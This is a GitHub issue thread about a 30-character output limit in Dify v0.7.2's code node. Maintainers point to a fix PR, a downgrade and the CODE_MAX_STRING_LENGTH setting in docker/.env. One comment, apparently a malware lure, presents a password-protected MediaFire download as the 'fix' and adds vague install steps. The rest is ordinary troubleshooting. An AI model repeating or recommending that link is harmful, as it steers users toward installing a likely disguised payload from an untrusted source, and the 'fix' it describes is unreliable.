### ISSUE TITLE
KOD - error - 30 characters long.

### ISSUE THREAD

**Issue by polhel** [langgenius/dify#7750]
### Self Checks

- [X] This is only for bug report, if you would like to ask a question, please head to [Discussions](https://github.com/langgenius/dify/discussions/categories/general).
- [X] I have searched for existing issues [search for existing issues](https://github.com/langgenius/dify/issues), including closed ones.
- [X] I confirm that I am using English to submit this report (我已阅读并同意 [Language Policy](https://github.com/langgenius/dify/issues/1542)).
- [X] [FOR CHINESE USERS] 请务必使用英文提交 Issue，否则会被关闭。谢谢！:）
- [X] Please do not modify this template :) and fill in all the required fields.

### Dify version

0.7.2

### Cloud or Self Hosted

Self Hosted (Docker)

### Steps to reproduce

I have code to retrieve URLs from Google search. everything worked fine until I upgraded to the latest version. Now the result of the array cannot be more than 30 characters long. URLs even have 100 characters each, why this restriction?  
"I have code to retrieve URLs from Google search. everything worked fine until I upgraded to the latest version. Now the result of the array cannot be more than 30 characters long. URLs even have 100 characters each, why this restriction? " 

### ✔️ Expected Behavior

![dify1](https://github.com/user-attachments/assets/e72573c8-d5e1-496f-b8d8-3b6122572c84)

**Comment by polhel** [comment]
Where is "dify_config.CODE_MAX_STRING_LENGTH" ? Or in which file?

**Comment by crazywoola** [comment]
Duplicated, we already fixed this yesterday in this PR https://github.com/langgenius/dify/pull/7683

In the meantime you could downgrade to v0.7.1. We will release this fix in v0.7.3

You can define this variable in docker/.env

**Comment by ViniciusSCG** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by leoncool23** [comment]
> 重复，我们昨天已在此 PR [#7683中修复了此问题](https://github.com/langgenius/dify/pull/7683)
> 
> 与此同时，你可以降级到 v0.7.1。我们将在 v0.7.3 中发布此修复程序
> 
> 您可以在 docker/.env 中定义此变量

我是上午刚部署的dify v0.7.2  也手动到 api/configs/feature/__init__.py。修改了

CODE_MAX_STRING_LENGTH: PositiveInt = Field(
    description="max string length for code execution",
    default=80000,     修改了default的长度，但是还是报错 
The length of output variable `result` must be less than 30 characters

**Comment by crazywoola** [comment]
> Duplicated, we already fixed this yesterday in this PR #7683
> 
> In the meantime you could downgrade to v0.7.1. We will release this fix in v0.7.3
> 
> You can define this variable in docker/.env

You need to update things in .env

**Comment by Sure0520** [comment]
> > 重复，我们昨天已在此 PR [#7683中修复了此问题](https://github.com/langgenius/dify/pull/7683)
> > 与此同时，你可以降级到 v0.7.1。我们将在 v0.7.3 中发布此修复程序
> > 您可以在 docker/.env 中定义此变量
> 
> 你需要更新 .env 中的内容

My .env file is also set to 80000, but I still get an error

**Comment by 948024326** [comment]
> > > 重复，我们昨天已在此 PR [#7683中修复了此问题](https://github.com/langgenius/dify/pull/7683)
> > > 与此同时，你可以降级到 v0.7.1。我们将在 v0.7.3 中发布此修复程序
> > > 您可以在 docker/.env 中定义此变量
> > 
> > 
> > 你需要更新 .env 中的内容
> 
> My .env file is also set to 80000, but I still get an error

did you fix that? my answer is certainly above 80000, can i set a huge number to fix this problem?

**Comment by polhel** [comment]
Yes, I updated Dify, and now works properly
